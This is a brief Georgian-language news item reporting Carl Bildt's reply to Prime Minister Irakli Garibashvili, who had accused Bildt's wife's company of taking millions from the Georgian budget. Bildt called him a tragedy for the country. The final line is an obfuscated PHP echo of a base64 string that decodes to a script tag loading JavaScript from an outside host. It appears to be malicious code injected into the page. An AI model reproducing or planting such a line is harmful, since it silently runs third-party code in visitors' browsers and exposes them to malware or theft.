celsiusi
ავერსი საქკაბელი
შვედეთის ყოფილი პრემიერმინისტრი და ევროპული საბჭოს საგარეო კომიტეტის თანათავმჯდომარე კარლ ბილდტი საქართველოს პრემიერმინისტრზე ირაკლი ღარიბაშვილზე წერს, რომ ის საქართველოსთვის ტრაგედიაა.
 
ამ განცხადებით ბილდტი ირაკლი ღარიბაშვილის ბრალდებებს გამოეხმაურა. პრემიერმინისტრმა პარლამენტში სიტყვით გამოსვლისას თქვა, რომ წინა ხელისუფლების დროს, "ბილდტის ცოლის კომპანიას მილიონები აქვს წაღებული ბიუჯეტიდან".
 
"ეს ბიჭი - საუბარი მაქვს საქართველოს პრემიერმინისტრზე - გამოსწორება შეუძლებელია. პარლამენტში სიტყვით გამოსვლისას ჩემი ცოლის დადანაშაულება საქართველოს ბიუჯეტიდან მილიონების მოპარვაში, აჩვენებს, რომ რელსებიდან გადავიდა. ის ტრაგედიაა ძალიან კარგი ქვეყნისთვის", - წერს კარლ ბილდტი.
716
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");